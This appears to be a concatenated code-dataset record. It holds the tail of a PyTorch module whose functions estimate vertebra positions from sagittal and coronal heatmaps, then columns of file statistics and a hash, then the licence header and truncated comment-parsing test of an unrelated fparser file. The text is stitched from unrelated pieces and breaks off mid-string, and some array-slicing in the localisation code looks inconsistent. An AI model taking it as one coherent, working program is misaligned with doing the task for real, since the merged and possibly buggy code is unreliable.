max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
for c_num in range(24):
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
for step in range(len(threshold_label)):
position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 3] = max_value
return position_batch
@torch.no_grad()
def pred_pos_2(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
"""
Compute the tensor product between output_sag and output_cor,
then use argmax to find the position of the ith vertebra in channel i.
Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.
Parameters:
output_sag & output_cor: output of the Btrfly Net
direc: it should be ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
Return:
a (BxCx3) tensor about the positions of the bones of every subjects in the batch
"""
if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
# threshold to reduce noise
threshold_noise = 0
threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
position_batch = torch.Tensor(len(threshold_label), B, C, 4)
resolution = 2.0
ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
for i in range(B):
direc = (direction[0][i], direction[1][i], direction[2][i])
if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
raise Exception('Unknown direction!')
# select ith subject
output_cor = output_cor_batch[i, :, :, :]
output_sag = output_sag_batch[i, :, :, :]
# reduce the noise according to threshold
reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
max_value, max_idx = torch.zeros(24), torch.zeros(24)
max_idx_x, max_idx_y, max_idx_z = torch.zeros(24), torch.zeros(24), torch.zeros(24)
if direc == ('Z', 'Y', 'X'):
# sag:(C, d1, d2), cor:(C, d0, d2)
if (output_sag.shape[2] != output_cor.shape[2]):
raise Exception("sag and cor should have an identical size in the last dimension!")
d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
# (24)
max_value_sag, max_idx_sag = torch.max(reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
for c_num in range(24):
if max_value_sag[c_num] > max_value_cor[c_num]:
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_cor_x[c_num], max_idx_sag_x[c_num], max_idx_sag_y[c_num]
max_value[c_num] = max_value_sag[c_num]
else:
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_cor_x[c_num], max_idx_sag_x[c_num], max_idx_cor_y[c_num]
max_value[c_num] = max_value_cor[c_num]
else:
# sag:(C, d0, d1), cor:(C, d1, d2)
if (output_sag.shape[2] != output_cor.shape[1]):
raise Exception("sag and cor should have an identical size in some dimension!")
d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i], sag_pad[0][i]:d2 - sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
# (24)
max_value_sag, max_idx_sag = torch.max(reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
for c_num in range(24):
if max_value_sag[c_num] > max_value_cor[c_num]:
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_sag_x[c_num], max_idx_sag_y[c_num], max_idx_cor_y[c_num]
max_value[c_num] = max_value_sag[c_num]
else:
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_sag_x[c_num], max_idx_cor_x[c_num], max_idx_cor_y[c_num]
max_value[c_num] = max_value_cor[c_num]
for step in range(len(threshold_label)):
position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 3] = max_value
return position_batch
@torch.no_grad()
def pred_pos_3(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
"""
Compute the tensor product between output_sag and output_cor,
then use argmax to find the position of the ith vertebra in channel i.
Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.
Parameters:
output_sag & output_cor: output of the Btrfly Net
direc: it should be ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
Return:
a (BxCx3) tensor about the positions of the bones of every subjects in the batch
"""
if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
f_size = 7
# threshold to reduce noise
threshold_noise = 0
threshold_label = torch.from_numpy(np.arange(0, 0.2, 0.005)).float()
position_batch = torch.Tensor(len(threshold_label), B, C, 4)
position_batch_sag = torch.Tensor(B, C, 3)
position_batch_cor = torch.Tensor(B, C, 3)
resolution = 1.0
ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
for i in range(B):
direc = (direction[0][i], direction[1][i], direction[2][i])
if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
raise Exception('Unknown direction!')
# select ith subject
output_cor = output_cor_batch[i, :, :, :]
output_sag = output_sag_batch[i, :, :, :]
# reduce the noise according to threshold
reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
max_value, max_idx = torch.zeros(24), torch.zeros(24)
if direc == ('Z', 'Y', 'X'):
# sag:(C, d1, d2), cor:(C, d0, d2)
if (output_sag.shape[2] != output_cor.shape[2]):
raise Exception("sag and cor should have an identical size in the last dimension!")
d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
sag_pad[0][i]:d2 - sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
cor_pad[0][i]:d2 - cor_pad[1][i]]
# for c_num in range(24):
#
# reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# (24)
max_value_sag, max_idx_sag = torch.max(
reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(
reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
#extend them to (d0, d1, d2)
for c_num in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
assert reduce_noise_cor_one_cha.shape[1] == reduce_noise_sag_one_cha.shape[1]
reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
else:
# sag:(C, d0, d1), cor:(C, d1, d2)
if (output_sag.shape[2] != output_cor.shape[1]):
raise Exception("sag and cor should have an identical size in some dimension!")
d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
sag_pad[0][i]:d2 - sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
cor_pad[0][i]:d2 - cor_pad[1][i]]
# for c_num in range(24):
#
# reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# (24)
max_value_sag, max_idx_sag = torch.max(
reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(
reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
#extend them to (d0, d1, d2)
for c_num in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d0 - sag_pad[3][i], sag_pad[0][i]:d1 - sag_pad[1][i]]
reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d1 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
assert reduce_noise_cor_one_cha.shape[0] == reduce_noise_sag_one_cha.shape[1]
reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
# translate the indexes to 3D form
max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
for c_num in range(24):
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
if direc == ('Z', 'Y', 'X'):
for c_num in range(24):
max_idx_z[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_y[c_num] * max_value_cor[c_num]) / \
(max_value_sag[c_num]+max_value_cor[c_num])
# if max_value_sag[c_num] > max_value_cor[c_num]:
# max_idx_z[c_num] = max_idx_sag_y[c_num]
# else:
# max_idx_z[c_num] = max_idx_cor_y[c_num]
else:
for c_num in range(24):
max_idx_y[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_x[c_num] * max_value_cor[c_num]) / \
(max_value_sag[c_num]+ max_value_cor[c_num])
# if max_value_sag[c_num] > max_value_cor[c_num]:
# max_idx_y[c_num] = max_idx_sag_y[c_num]
# else:
# max_idx_y[c_num] = max_idx_cor_x[c_num]
for step in range(len(threshold_label)):
position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
* (2 * (max_value > threshold_label[step]).float() - 1) \
- (max_value <= threshold_label[step]).float()
position_batch[step, i, :, 3] = max_value
position_batch_sag[i, :, 0] = max_idx_sag_x
position_batch_sag[i, :, 1] = max_idx_sag_y
position_batch_sag[i, :, 2] = max_value_sag
position_batch_cor[i, :, 0] = max_idx_cor_x
position_batch_cor[i, :, 1] = max_idx_cor_y
position_batch_cor[i, :, 2] = max_value_cor
return position_batch, position_batch_cor , position_batch_sag
@torch.no_grad()
def pred_pos_4(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
"""
Compute the tensor product between output_sag and output_cor,
then use argmax to find the position of the ith vertebra in channel i.
Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.
Parameters:
output_sag & output_cor: output of the Btrfly Net
direc: it should be ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
Return:
a (BxCx3) tensor about the positions of the bones of every subjects in the batch
"""
if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
f_size = 7
# threshold to reduce noise
threshold_noise = 0
threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
position_batch = torch.Tensor(len(threshold_label), B, C, 4)
position_batch_sag = torch.Tensor(B, C, 2)
position_batch_cor = torch.Tensor(B, C, 2)
resolution = 1.0
ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
for i in range(B):
direc = (direction[0][i], direction[1][i], direction[2][i])
if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
raise Exception('Unknown direction!')
# select ith subject
output_cor = output_cor_batch[i, :, :, :]
output_sag = output_sag_batch[i, :, :, :]
# reduce the noise according to threshold
reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
max_value, max_idx, max_cor_num = torch.zeros(24), torch.zeros(24), torch.zeros(24)
if direc == ('Z', 'Y', 'X'):
# sag:(C, d1, d2), cor:(C, d0, d2)
if (output_sag.shape[2] != output_cor.shape[2]):
raise Exception("sag and cor should have an identical size in the last dimension!")
d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][
i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
sag_pad[0][i]:d2 - sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
cor_pad[0][i]:d2 - cor_pad[1][i]]
# for c_num in range(24):
#
# reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# (24)
max_value_sag, max_idx_sag = torch.max(
reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(
reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
# extend them to (d0, d1, d2)
for c_num_sag in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag_no_padding[c_num_sag, :, :].unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
for c_num_cor in range(24):
reduce_noise_cor_one_cha = reduce_noise_cor_no_padding[c_num_cor, :, :].unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]),
int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value_tmp, max_idx_tmp = torch.max(product.view(-1), dim=0)
if max_value_tmp.cpu() > max_value[c_num_sag]:
max_value[c_num_sag], max_idx[c_num_sag], max_cor_num[c_num_sag] = max_value_tmp, max_idx_tmp, c_num_cor
else:
# sag:(C, d0, d1), cor:(C, d1, d2)
if (output_sag.shape[2] != output_cor.shape[1]):
raise Exception("sag and cor should have an identical size in some dimension!")
d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][
i], d2 - cor_pad[0][i] - cor_pad[1][i]
reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
sag_pad[0][i]:d2 - sag_pad[1][i]]
reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
cor_pad[0][i]:d2 - cor_pad[1][i]]
# for c_num in range(24):
#
# reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
# (24)
max_value_sag, max_idx_sag = torch.max(
reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
max_value_cor, max_idx_cor = torch.max(
reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
# extend them to (d0, d1, d2)
for c_num_sag in range(24):
reduce_noise_sag_one_cha = reduce_noise_sag_no_padding[c_num_sag, :, :].unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]),
int(ori_d2[i]))
for c_num_cor in range(24):
reduce_noise_cor_one_cha = reduce_noise_cor_no_padding[c_num_cor, :, :].unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]),
int(ori_d2[i]))
product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
# find maximum value for each batch and channel
max_value_tmp, max_idx_tmp = torch.max(product.view(-1), dim=0)
if max_value_tmp.cpu() > max_value[c_num_sag]:
max_value[c_num_sag], max_idx[c_num_sag], max_cor_num[c_num_sag] = max_value_tmp, max_idx_tmp, c_num_cor
# translate the indexes to 3D form
max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
for c_num in range(24):
max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
(max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
if direc == ('Z', 'Y', 'X'):
for c_num in range(24):
max_idx_z[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_y[c_num] * max_value_cor[
c_num]) / \
(max_value_sag[c_num] + max_value_cor[c_num])
# if max_value_sag[c_num] > max_value_cor[c_num]:
# max_idx_z[c_num] = max_idx_sag_y[c_num]
# else:
# max_idx_z[c_num] = max_idx_cor_y[c_num]
else:
for c_num in range(24):
max_idx_y[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_x[c_num] * max_value_cor[
c_num]) / \
(max_value_sag[c_num] + max_value_cor[c_num])
# if max_value_sag[c_num] > max_value_cor[c_num]:
# max_idx_y[c_num] = max_idx_sag_y[c_num]
# else:
# max_idx_y[c_num] = max_idx_cor_x[c_num]
for step in range(len(threshold_label)):
position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][
i, 0, 0]) \
* (2 * (max_value >= threshold_label[step]).float() - 1) \
- (max_value < threshold_label[step]).float()
position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][
i, 0, 1]) \
* (2 * (max_value >= threshold_label[step]).float() - 1) \
- (max_value < threshold_label[step]).float()
position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][
i, 0, 2]) \
* (2 * (max_value >= threshold_label[step]).float() - 1) \
- (max_value < threshold_label[step]).float()
position_batch[step, i, :, 3] = max_value
position_batch_sag[i, :, 0] = max_idx_sag_x
position_batch_sag[i, :, 1] = max_idx_sag_y
position_batch_cor[i, :, 0] = max_idx_cor_x
position_batch_cor[i, :, 1] = max_idx_cor_y
return position_batch, position_batch_cor, position_batch_sag
| 56.45614
| 164
| 0.579967
| 6,005
| 38,616
| 3.402331
| 0.034971
| 0.051686
| 0.029122
| 0.02692
| 0.930155
| 0.916157
| 0.905878
| 0.901375
| 0.901375
| 0.896383
| 0
| 0.03392
| 0.28237
| 38,616
| 684
| 165
| 56.45614
| 0.703342
| 0.137482
| 0
| 0.790598
| 0
| 0
| 0.031123
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 1
| 0.019231
| false
| 0
| 0.008547
| 0
| 0.047009
| 0.002137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b0cb06523685cabf2c7193119ffaf25a4c85d408
| 5,617
|
py
|
Python
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 33
|
2017-08-18T16:31:27.000Z
|
2022-03-28T09:43:50.000Z
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 319
|
2017-01-12T14:22:07.000Z
|
2022-03-23T20:53:25.000Z
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 17
|
2017-10-13T07:12:28.000Z
|
2022-02-11T14:42:18.000Z
|
# Modified work Copyright (c) 2017-2018 Science and Technology
# Facilities Council
# Original work Copyright (c) 1999-2008 Pearu Peterson
# All rights reserved.
# Modifications made as part of the fparser project are distributed
# under the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# --------------------------------------------------------------------
# The original software (in the f2py project) was distributed under
# the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# a. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# b. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# c. Neither the name of the F2PY project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
from fparser.api import parse
def test_comment_lines():
source_str = '''\
!comment line 1
!comment line 2
module foo
!comment line 3
subroutine f
!comment line 4
end subroutine f !comment line 5
end module foo
'''
tree = parse(source_str, isfree=True, isstrict=False,
ignore_comments=False)
assert str(tree).strip().split('\n')[1:] == '''
